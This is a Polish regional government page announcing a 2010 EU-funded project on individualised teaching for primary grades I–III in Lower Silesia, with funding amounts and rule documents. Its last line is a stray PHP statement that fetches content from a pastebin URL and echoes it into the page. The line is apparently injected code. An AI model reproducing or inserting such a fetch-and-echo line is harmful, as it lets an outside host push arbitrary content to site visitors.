Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej

Informujemy, że Urząd Marszałkowski Województwa Dolnośląskiego rozpoczął przygotowania do wdrażania projektu systemowego: Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w kontekście wdrażania nowej podstawy kształcenia ogólnego .

Krajowa koncepcja realizacji tego projektu, opracowana przez Instytucję Zarządzającą PO KL w porozumieniu z Ministerstwem Edukacji Narodowej, zakłada, że projekt będzie realizowany w trybie systemowym przez IP lub IP2, a projektodawcami będą organy prowadzące szkoły podstawowe.

Ogólne założenia realizacji projektu ujęte zostały w Zasadach przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organy prowadzące szkoły w ramach Programu Operacyjnego Kapitał Ludzki, zatwierdzonych przez IZ PO KL 23 kwietnia br. Dokument ten przewiduje możliwość uszczegółowienia warunków realizacji projektu systemowego i z tej możliwości skorzystała tutejsza Instytucja Pośrednicząca.

Regionalna koncepcja, przyjęta przez Zarząd Województwa Dolnośląskiego decyzją 8 lutego br., zakłada przeprowadzenie jesienią 2010 r. tylko jednego naboru wniosków o dofinansowanieprojektu, który obejmie całość alokacji przeznaczonej dla Dolnego Śląska, czyli kwoty 39.693.983,00 zł. Oznacza to, że beneficjenci, którzy teraz nie zaaplikują o środki, będą pozbawieni tej możliwości w latach następnych.

Jest to istotne z tego względu, że projekt Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych (…) jest kluczowym elementem prowadzonej obecnie polityki oświatowej i nieprzystąpienie do niego może wpłynąć na realizację nowej podstawy programowej kształcenia ogólnego w szkołach podstawowych (ujętej w Ustawie z dnia 7 września 1991 r. o systemie oświaty). Dzięki niemu szkoły będą wspomagane w procesie edukacji uwzględniającym indywidualną pracę z dzieckiem i wspieranie jego osobistego rozwoju. Przystąpienie do realizacji tego projektu umożliwi sfinansowanie dodatkowych zajęć (m.in. zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, specjalistycznych zajęć terapeutycznych dla dzieci niepełnosprawnych, zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych) oraz doposażenie bazy dydaktycznej szkoły w materiały i sprzęt specjalistyczny.

Pozostałe, szczegółowe zasady aplikacji i realizacji projektów systemowych w naszym województwie, przedstawione zostaną przez IP podczas spotkań informacyjnych skierowanych do przedstawicieli szkół podstawowych i podmiotów prowadzących szkoły podstawowe, które zaplanowaliśmy na maj i czerwiec br.

Zasady przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organy prowadzące szkoły w ramach Programu Kapitał Ludzki (1 stycznia 2013)

 Dokument do pobrania 

Zasady przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organy prowadzące szkoły w ramach Programu Kapitał Ludzki (1 stycznia 2012)  

 Dokument do pobrania

Zasady przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organy prowadzące szkoły w ramach Programu Operacyjnego Kapitał Ludzki (24 maja 2011 r.)

Dokument do pobrania

Zasady przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organy prowadzące szkoły w ramach Programu Operacyjnego Kapitał Ludzki (23 kwietnia 2010 r.). – wersja archiwalna

Dokument do pobrania

Podział środków przeznaczonych na realizację projektu systemowego „Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w kontekście wdrażania nowej podstawy kształcenia ogólnego” - więcej informacji

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");